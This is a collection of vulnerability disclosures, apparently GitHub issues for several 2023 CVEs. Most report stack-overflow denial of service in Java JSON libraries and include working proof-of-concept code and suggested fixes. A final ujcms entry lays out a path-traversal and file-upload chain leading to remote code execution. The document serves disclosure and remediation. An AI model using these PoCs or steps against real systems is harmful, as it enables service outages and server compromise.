An issue was discovered JSONUtil thru 5.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by jsonutil parsing of untrusted JSON String****Description**

Using jsonutil to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at net.pwall.util.ParseText.skipSpaces(ParseText.java:1072)
    	at net.pwall.json.JSON.parse(JSON.java:535)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    
    

**PoC**

        <dependency\>
            <groupId\>net.pwall.json</groupId\>
            <artifactId\>jsonutil</artifactId\>
            <version\>5.0</version\>
        </dependency\>

import net.pwall.json.JSON;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JSON.parse(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34615: Stack overflow error caused by jsonutil parsing of untrusted JSON String · Issue #10 · billdavidson/JSONUtil

An issue was discovered ph-json thru 9.5.5 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by ph-json parsing of untrusted JSON String****Description**

Using ph-json to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.util.ArrayList.get(ArrayList.java:459)
    	at com.helger.commons.collection.impl.ICommonsList.getLast(ICommonsList.java:201)
    	at com.helger.commons.collection.impl.ICommonsList.getLast(ICommonsList.java:186)
    	at com.helger.commons.collection.NonBlockingStack.peek(NonBlockingStack.java:112)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler._addToStackPeek(CollectingJsonParserHandler.java:51)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler._addSimple(CollectingJsonParserHandler.java:71)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler._addCollection(CollectingJsonParserHandler.java:76)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler.onArrayStart(CollectingJsonParserHandler.java:115)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:804)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    
    

**PoC**

        <dependency\>
            <groupId\>com.helger</groupId\>
            <artifactId\>ph-json</artifactId\>
            <version\>9.5.5</version\>
        </dependency\>

import com.helger.json.serialize.JsonReader;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonReader.readFromString(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34612: Stack overflow error caused by ph-json parsing of untrusted JSON String · Issue #35 · phax/ph-commons

An issue was discovered sojo thru 1.1.1 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by sojo parsing of untrusted JSON String****Description**

Using sojo to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_scan_token(JsonParserGenerate.java:503)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_4(JsonParserGenerate.java:344)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_3(JsonParserGenerate.java:374)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_3(JsonParserGenerate.java:351)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_13(JsonParserGenerate.java:295)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_6(JsonParserGenerate.java:313)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_6(JsonParserGenerate.java:258)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_3(JsonParserGenerate.java:357)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_13(JsonParserGenerate.java:295)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_2_13(JsonParserGenerate.java:252)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:144)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
    
    

**PoC**

        <dependency\>
            <groupId\>net.sf.sojo</groupId\>
            <artifactId\>sojo</artifactId\>
            <version\>1.1.1</version\>
        </dependency\>

import net.sf.sojo.interchange.json.JsonParser;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonParser parser = new JsonParser();
        parser.parse(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34613: Stack overflow error caused by sojo parsing of untrusted JSON String · Issue #15 · maddingo/sojo

An issue was discovered jjson thru 0.1.7 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

**Stack overflow error caused by jjson serialization Map****Description**

jjson before v0.1.7 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.AggregateTranslator.translate(AggregateTranslator.java:52)
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.AggregateTranslator.translate(AggregateTranslator.java:52)
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.CharSequenceTranslator.translate(CharSequenceTranslator.java:87)
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.CharSequenceTranslator.translate(CharSequenceTranslator.java:61)
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.StringEscapeUtils.escapeJava(StringEscapeUtils.java:456)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeString(JSONAnnotationEncoder.java:286)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:149)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    
    

**PoC**

        <dependency\>
            <groupId\>de.grobmeier.json</groupId\>
            <artifactId\>jjson</artifactId\>
            <version\>0.1.7</version\>
        </dependency\>

import de.grobmeier.jjson.JSONException;
import de.grobmeier.jjson.convert.JSONAnnotationEncoder;

import java.util.HashMap;

public class PoC2 {

    public static void main(String\[\] args) throws JSONException {
        HashMap<String,Object\> map\=new HashMap<>();
        map.put("t",map);
        JSONAnnotationEncoder jsonAnnotationEncoder = new JSONAnnotationEncoder();
        jsonAnnotationEncoder.encode(map);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)
    

**References**

1.  If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos jettison-json/jettison#52
2.  https://github.com/jettison-json/jettison/pull/53/files

1 participant

CVE-2023-35110: Stack overflow error caused by jjson serialization Map · Issue #2 · grobmeier/jjson

An issue was discovered hjson thru 3.0.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by hjson parsing of untrusted JSON String****Description**

Using hjson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at org.hjson.HjsonParser.read(HjsonParser.java:454)
    	at org.hjson.HjsonParser.skipWhiteSpace(HjsonParser.java:411)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:185)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    
    

**PoC**

        <dependency\>
            <groupId\>org.hjson</groupId\>
            <artifactId\>hjson</artifactId\>
            <version\>3.0.0</version\>
        </dependency\>

import org.hjson.JsonValue;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = "{" + \_nestedDoc(TOO\_DEEP\_NESTING, "a : { ", "} ", "") + "}";


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonValue.readHjson(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34620: Stack overflow error caused by hjson parsing of untrusted JSON String  (2) · Issue #24 · hjson/hjson-java

An issue was discovered genson thru 1.6 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by genson parsing of untrusted JSON String****Description**

Using genson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at com.owlike.genson.stream.JsonReader.begin(JsonReader.java:409)
    	at com.owlike.genson.stream.JsonReader.beginArray(JsonReader.java:149)
    	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:172)
    	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:159)
    	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.deserialize(NullConverterFactory.java:77)
    	at com.owlike.genson.Genson.deserialize(Genson.java:382)
    	at com.owlike.genson.convert.DefaultConverters$UntypedConverterFactory$UntypedConverter.deserialize(DefaultConverters.java:997)
    	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.deserialize(NullConverterFactory.java:77)
    	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:176)
    	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:159)
    	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.deserialize(NullConverterFactory.java:77)
    	at com.owlike.genson.Genson.deserialize(Genson.java:382)
    
    

**PoC**

        <dependency\>
            <groupId\>com.owlike</groupId\>
            <artifactId\>genson</artifactId\>
            <version\>1.6</version\>
        </dependency\>

import com.owlike.genson.Genson;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        // 创建 Genson 实例
        Genson genson = new Genson();

        // 模糊测试 JSON 解析
        Object parsedObject = genson.deserialize(jsonString, Object.class);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34617: Stack overflow error caused by genson parsing of untrusted JSON String · Issue #191 · owlike/genson

An issue was discovered jmarsden/jsonij thru 0.5.2 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

Using jsonij to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

Exception in thread "main" java.lang.StackOverflowError
    at jsonij.ArrayImp.internalType(ArrayImp.java:53)
    at jsonij.Value.<init>(Value.java:54)
    at jsonij.ArrayImp.<init>(ArrayImp.java:44)
    at jsonij.JSON$Array.<init>(JSON.java:326)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:271)
    at jsonij.parser.JSONParser.parseValue(JSONParser.java:180)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:275)
    at jsonij.parser.JSONParser.parseValue(JSONParser.java:180)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:275)
    at jsonij.parser.JSONParser.parseValue(JSONParser.java:180)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:275)

        <dependency>
            <groupId>cc.plural</groupId>
            <artifactId>jsonij</artifactId>
            <version>0.5.2</version>
        </dependency>

import jsonij.Value;
import jsonij.parser.JSONParser;
import jsonij.parser.ParserException;

public class PoC {

    public final static int TOO\_DEEP\_NESTING \= 9999;
    public final static String TOO\_DEEP\_DOC \= \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");

    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb \= new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i \= 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) \== 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i \= 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) \== 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) throws ParserException {
        String jsonString \= TOO\_DEEP\_DOC;
        JSONParser jsonParser \= new JSONParser();
        Value parse \= jsonParser.parse(jsonString);
    }
}

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b))
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027）))

‌

CVE-2023-34614: Stack overflow error caused by jsonij parsing of untrusted JSON String

An issue was discovered json-io thru 4.14.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by json-io parsing of untrusted JSON String****Description**

Using json-io to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:241)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    
    

**PoC**

<dependency\>
	<groupId\>com.cedarsoftware</groupId\>
	<artifactId\>json-io</artifactId\>
	<version\>4.14.0</version\>
</dependency\>

import com.cedarsoftware.util.io.JsonReader;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonReader.jsonToJava(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34610: Stack overflow error caused by json-io parsing of untrusted JSON String · Issue #169 · jdereg/json-io

Directory traversal vulnerability in ujcms 6.0.2 allows attackers to move files via the rename feature.

\[Vulnerability description\]  
The Remote Code Execution (RCE) vulnerability exists in ujcms v6.0.2, when the project is partially configured on Linux using Tomcat, attackers can use path traversal and arbitrary file uploads to execute arbitrary code.

\[Vulnerability Type\]  
Remote Code Execution (RCE)

\[Vendor of Product\]  
https://gitee.com/ujcms/ujcms  
https://github.com/ujcms/ujcms  
https://www.ujcms.com/

\[Affected Product Code Base\]  
v6.0.2

\[Vulnerability proof\]  
The code restricts the access and execution of jsp and jspx files, but it exists in any path and any file upload, so you can upload a web.xml file and add a jsp resolvable suffix, such as abc

    <servlet-mapping>
        <servlet-name>jsp</servlet-name>
        <url-pattern>*.abc</url-pattern>
    </servlet-mapping>
    

Condition: It needs to be deployed with tomcat on Linux, and the configuration file cannot be overwritten on Windows, and File.renameTo is used

1.  Upload web.xml  
    Download an initial configuration file web.xml of tomcat, and add the above configuration in the following location  
      
    Upload the web.xml file to the uploads directory first, and use the path id to indicate it when uploading, and the path cannot be traversed  
      
    Rename, the capture package can traverse the path at the file name, and overwrite the original web.xml  
    
2.  Upload the Trojan horse  
    Upload a Trojan horse and execute the ping command. At this time, the uploaded suffix cannot be the custom analytical suffix above. You can upload any suffix and rename it later, otherwise the upload will not succeed  
      
    The upload suffix is ​​abc1  
      
    Renamed to ../../123.abc, the path traverses to the root directory  
      
    Visit 123.abc and successfully trigger rce  
    

\[Code Details\]

1.  Upload  
    Track the rename interface, find that the parameters are being passed to doUpload, and verify the suffix at the upload  
    com.ujcms.cms.core.web.backendapi.AbstractUploadController#doUpload  
      
    The suffix can be uploaded without any problem.
    
2.  Rename  
    com.ujcms.cms.core.web.backendapi.AbstractWebFileController#rename is the same as upload, it has checkName to verify the file name, enter here to view the code  
      
    com.ujcms.cms.core.web.backendapi.AbstractWebFileController#checkName(java.lang.String) Check the file name, when both meet  
    (1) The file name is empty  
    (2) The file name contains illegal characters  
    an exception is thrown, but the first condition is always false, and the conditions cannot be met at the same time, so this verification will always be bypassed, so it can be executed, and then any file can be renamed and uploaded.  
      
